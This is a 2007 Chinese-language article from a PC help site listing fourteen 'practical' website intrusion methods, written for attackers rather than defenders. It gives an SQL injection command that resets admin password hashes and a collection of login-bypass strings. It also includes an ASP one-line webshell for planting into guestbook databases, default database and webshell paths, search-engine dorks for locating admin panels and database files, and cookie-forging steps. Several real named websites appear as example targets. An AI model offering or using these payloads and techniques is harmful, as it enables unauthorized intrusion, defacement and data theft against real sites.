PC啦啦首页
维修网点
QQ专家在线
电脑保修
工具软件
在线查毒
电脑问题搜索
官方论坛
站点地图
友情链接
XML
RSS 2.0
联盟点:
北京
上海
深圳
广州
南京
杭州
成都
西安
厦门
武汉
重庆
天津
更多城市
加入收藏夹
设为主页
认识电脑
电脑优化
电脑保养
故障症状
学习维修
维修资料
病毒门诊
数据恢复
使用技巧
电脑常识
笔记本(Notebook)
安全技术
专题导读:
操作系统
Windows Vista系统故障
Windows Xp系统故障
Windows 2003系统故障
Windows 2000系统故障
Windows 98系统故障
软件使用
网络配置
网络攻击
病毒
木马
主板
CPU
内存
硬盘
键盘
显卡
声卡
鼠标
显示器
音箱
刻录机
光驱、光盘
电源、UPS
网络设备
扫描仪
打印机
其它硬件
服务器
游戏平台
手机/MP3
相机/摄像头
USB
无线应用教程
您的位置:
Pclala首页
>>
安全技术
>>
揭密黑客网络入侵的十四种实用方法
揭密黑客网络入侵的十四种实用方法
发布日期: 2007-1-13 17:56:43 查看数:
1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞[不多讲]
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]
3.旁注,也就是跨站.
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
4.暴库:把二级目录中间的/换成%5c
EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围BigClassType=1
如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
6.社会工程学。这个我们都知道吧。就是猜解。
EY:http://www.neu.edu.cn/waishi/admin
admin waishi
7.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马
8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
这个站用的是:杰出校友录,源码我下过了,
默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目录法:人一些网站可以断开目录,可以方问目录。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
这样我们可以找到数据库,下载不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈关键字很多,自已找〉
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的连接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了
14.利用常见的漏洞:如动网BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。
工具:dvbbs权限提升工具 动网固顶贴工具
15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
上下页导航
上一页:
让计算机启动更快的十五招
下一页:
最新病毒分析报告:“Nimaya(熊猫烧香)”
【打印】
字体
【大】
【中】
【小】
【关闭】
热点主题
实战:ARP攻击原理及解决方法
网吧频繁掉线(ARP)与解决方法
远程终端安全及其安全防范技术研究
如何隐藏自己的ip地址
Windows中如何删除cmd.exe
系统安全:将木马拒之门外 设置电脑防止黑客入侵
修改远程终端服务端口3389的方法
关于新一代的DDoS攻击方法
ADSL防御黑客进攻的方法
协议欺骗攻击技术常见种类简析及防范
黑客攻击行为特征分析 反攻击技术综合性分析报告
打造安全的Windows XP 操作系统
液晶面板鉴别四个方面
黑客常用攻击手段揭秘及其预防措施
无线网络安全六种简单技巧
如何查看自己机器已经开放的端口
抢先了解最易被黑客利用的注册表位置
IIS安全配置教程
解析来自Autorun.inf文件的攻击
如何关闭端口防止病毒与黑客入侵
最新主题
14招保护路由器安全的方法
使用 IPsec 与组策略隔离服务器和域
网络攻击的几种攻击与防御手法大揭秘
设置组策略仍无法共享
小区宽带被人共享了硬盘
解读DDOS及防御DDOS攻击指南
Windows服务器安全解决方案
保护数据,限制驱动器的访问
Windows安全防范
如何在xp/2k/2003下手动关闭网络端口
高效保护系统安全 管好XP防火墙几则技巧
禁止他人进入你的系统安全模式干坏事
七招打造安全的Win XP 操作系统
SYN攻击的基本原理、工具及检测方法以及防范技术
Win2000简单安全配置
ARP病毒攻击技术分析与防御
局域网内部的ARP攻击是指什么
巧妙清除并防范局域网中的ARP病毒
网络资源推荐
站务联系:XBell@163.com 在线QQ:573861490
备案序号:粤ICP备06093858号
版权所有 2006 PC 啦啦.电脑大本营 最佳分辨率 1024 X 768
Copyright © Http://www.Pclala.com/ All rights reserved. Powered by
